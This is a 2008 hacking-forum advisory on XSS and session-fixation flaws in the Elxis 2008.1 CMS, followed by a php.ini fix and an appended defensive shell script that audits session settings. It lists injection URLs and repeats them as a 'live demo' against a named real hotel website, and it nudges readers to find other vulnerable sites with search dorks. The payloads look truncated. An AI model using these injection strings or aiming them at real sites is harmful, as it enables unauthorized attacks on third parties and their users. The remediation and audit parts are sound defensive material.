################################################################
# darkc0de crew                                                #
# est.2007                                  forum.darkc0de.com #
################################################################
# Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01          #
#              -C1c4Tr1Z -Gabitzu and all darkc0de members     #
;###############################################################
#
# Author: swappie [aka] faithlove
#
# Home  : www.darkc0de.com
#
# Email : swappieakafaithlove@gmail.com
#
# Do researching and share!
;###############################################################
#
# Title: Elxis 2008.1 Nemesis
#
# Issue Date: Monday, 29 September 2008
#
# CMS Link: http://www.elxis-downloads.com/fserver/96.html
# Vendor: http://www.elxis.org/
#
;###############################################################
#
# Dork: I'm sure you can figure that by yourself, right?
#
#################################################################

----------
XSS Vulns;
----------

http://www.site.com/?>'">
http://www.site.com/index.php/>">
http://www.site.com/index.php?option=>">
http://www.site.com/index.php?option=com_poll&Itemid=>">
http://www.site.com/index.php?option=com_poll&task=view&id=>">
http://www.site.com/index.php?option=com_poll&Itemid=1&task=>">
http://www.site.com/index.php?option=com_poll&task=view&bid=>">
http://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>">

----------
Live Demo;
----------

http://www.hotelsinalbania.net/?>'">
http://www.hotelsinalbania.net/index.php/>">
http://www.hotelsinalbania.net/index.php?option=>">
http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>">
http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>">
http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>">
http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>">
http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>">

;==================================================================;
;==================================================================;

-----------------
Session Fixation;
-----------------

http://www.site.com/?PHPSESSID=[session_fixation]

Explanation:
The attacker can fix the user's session ID before the user even logs on to
the target server, so there is no need to obtain the session ID afterwards.

How to fix the "session fixation"?
There is a simple way to do it.

Step 1. Open the file named php.ini from your server.
Step 2. Look through the file for the following lines:

    ; This option enables administrators to make their users invulnerable to
    ; attacks which involve passing session ids in URLs; defaults to 0.
    ; session.use_only_cookies = 1

!![PLEASE NOTE THE ";"]!!

Step 3.
=> [ remove the leading ";" from the last line and make it look like this: ]

    ; This option enables administrators to make their users invulnerable to
    ; attacks which involve passing session ids in URLs; defaults to 0.
    session.use_only_cookies = 1

Step 4. Restart the web server, php, whatever.

Cheers,
swappie [aka] faithlove
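
Added example (not part of the original advisory): a shell check for Steps 2-4 that reads a php.ini and reports whether session.use_only_cookies is actually in effect, catching the commented-out ";" case. The function names and sample files are constructed for illustration, and the session.use_trans_sid check goes beyond what the advisory covers.

```shell
#!/bin/sh
# Added example: audit a php.ini for the session settings tied to session
# fixation via URL. Function names and sample files are constructed here.

# Print the effective value of directive $2 in ini file $1 (empty if unset).
# Lines starting with ";" are comments; the last active assignment wins.
ini_value() {
    awk -v key="$2" '
        /^[ \t]*;/ { next }                  # commented out, so not in effect
        {
            line = $0
            sub(/[ \t]*;.*$/, "", line)      # drop a trailing comment
            n = index(line, "=")
            if (n == 0) next
            k = substr(line, 1, n - 1); v = substr(line, n + 1)
            gsub(/^[ \t]+|[ \t]+$/, "", k)
            gsub(/^[ \t"]+|[ \t"]+$/, "", v)
            if (k == key) val = v
        }
        END { print val }' "$1"
}

# php.ini boolean spellings that mean "enabled".
is_on() {
    case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
        1|on|true|yes) return 0 ;;
        *) return 1 ;;
    esac
}

# Return 0 only if the file refuses session IDs passed in URLs. Unset counts
# as a finding because the page gives the default as 0.
audit_session_ini() {
    rc=0
    v=$(ini_value "$1" session.use_only_cookies)
    if is_on "$v"; then echo "ok   session.use_only_cookies = $v"
    else echo "FAIL session.use_only_cookies = ${v:-<not set>}"; rc=1; fi
    v=$(ini_value "$1" session.use_trans_sid)   # beyond the page: SID in links
    if is_on "$v"; then echo "FAIL session.use_trans_sid = $v"; rc=1; fi
    return $rc
}

# Constructed samples: the "before" (Step 2) and "after" (Step 3) states.
tmp=$(mktemp -d); trap 'rm -rf "$tmp"' EXIT
printf '%s\n' '; session.use_only_cookies = 1' > "$tmp/before.ini"
printf '%s\n' 'session.use_only_cookies = 1'   > "$tmp/after.ini"
audit_session_ini "$tmp/before.ini" || echo "before.ini: URL session IDs accepted"
audit_session_ini "$tmp/after.ini"  && echo "after.ini: URL session IDs refused"
```

The file on disk is only part of the picture: per-directory overrides and ini_set() calls can change the value at runtime, so confirm the effective setting with phpinfo() after the restart in Step 4.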